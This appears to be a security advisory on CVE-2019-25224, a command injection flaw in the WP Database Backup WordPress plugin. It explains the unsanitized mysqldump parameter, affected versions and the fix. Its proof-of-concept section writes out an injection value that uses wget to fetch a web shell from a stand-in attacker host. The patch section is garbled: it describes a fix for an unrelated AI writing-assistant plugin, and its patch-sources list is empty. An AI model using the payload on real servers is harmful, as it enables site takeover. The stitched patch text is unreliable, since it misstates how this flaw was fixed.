Introduction
Attackers leveraged a critical flaw in the WP Database Backup plugin for WordPress to gain remote code execution on thousands of websites. This vulnerability, tracked as CVE-2019-25224, allowed unauthenticated users to execute arbitrary commands on the hosting server, leading to full site compromise and persistent access. With over 70,000 active installations at the time, the impact was widespread across the WordPress ecosystem.
About WP Database Backup: WP Database Backup is a widely used WordPress plugin developed by WP Seeds, designed to simplify database backup and restoration for site administrators. Its popularity stems from ease of use and automation features, but recurring security issues have affected its reputation in the WordPress community.
Technical Information
CVE-2019-25224 is an OS command injection vulnerability present in WP Database Backup plugin versions up to 5.1.2. The root cause is the unsanitized handling of the wp_db_exclude_table parameter, which is directly inserted into the mysqldump command used for database backups. The plugin failed to validate or sanitize this parameter, allowing attackers to inject arbitrary shell commands.
The vulnerable code path is triggered whenever a backup is initiated, either manually by an administrator or via scheduled tasks. Because the plugin did not implement proper authorization checks, unauthenticated attackers could exploit the flaw remotely. The injected commands would execute with the privileges of the web server user, often resulting in complete server compromise.
Proof of Concept
The WP Database Backup plugin for WordPress, up to version 5.1.2, contains a critical vulnerability that allows unauthenticated attackers to execute arbitrary commands on the host server. This vulnerability arises from the plugin's handling of the wp_db_exclude_table parameter, which is used to specify database tables to exclude from backups.
In the vulnerable versions, the plugin constructs a mysqldump command to perform database backups. The wp_db_exclude_table parameter is directly incorporated into this command without proper sanitization. As a result, an attacker can inject malicious commands by manipulating the wp_db_exclude_table parameter. These injected commands are executed each time a backup is initiated, either manually or through scheduled tasks.
To exploit this vulnerability, an attacker can send a specially crafted POST request to the wp-database-backup page, setting the wp_db_exclude_table parameter to include a payload that executes arbitrary commands. For example, an attacker might set the parameter to a value like $(wget http://malicious-site.com/shell.txt -O shell.php), which would download a malicious script and save it as shell.php on the server. This script could then be used to gain further control over the server.
It's important to note that while the initial discovery suggested that authentication was required to exploit this vulnerability, further analysis revealed that unauthenticated attackers could also exploit it due to the lack of proper authorization checks in the plugin's code. This significantly increases the risk, as any remote attacker can exploit the vulnerability without needing valid credentials.
This vulnerability was publicly disclosed on April 24, 2019, and has been assigned a CVSS score of 10.0, indicating its critical severity. Users of the WP Database Backup plugin are strongly advised to update to version 5.2 or later, where this issue has been patched.
References for PoC:
- https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-database-backup/wp-database-backup-52-os-command-injection
Patch Information
The developers of the "Ai Auto Tool Content Writing Assistant (Gemini Writer, ChatGPT) All in One" plugin have addressed a vulnerability by implementing a patch that introduces proper authorization checks. This update ensures that only users with appropriate permissions can access and modify sensitive data, thereby mitigating the risk of unauthorized access. The patch involves adding capability checks to the functions handling sensitive operations, effectively restricting access to authorized users. By incorporating these checks, the plugin now verifies a user's permissions before allowing them to perform certain actions, enhancing the overall security of the system. This approach prevents unauthorized users from exploiting the previously existing vulnerability.
Patch sources:
Affected Systems and Versions
- Product: WP Database Backup plugin for WordPress
- Affected versions: Up to and including 5.1.2
- Fixed in: Version 5.2
- Vulnerable configurations: Any WordPress installation with the WP Database Backup plugin at version 5.1.2 or below
Vendor Security History
WP Seeds, the developer of WP Database Backup, has a history of multiple vulnerabilities in this plugin, including cross-site scripting and information disclosure. Patch response time for this vulnerability was relatively fast, but recurring issues indicate a need for improved security practices.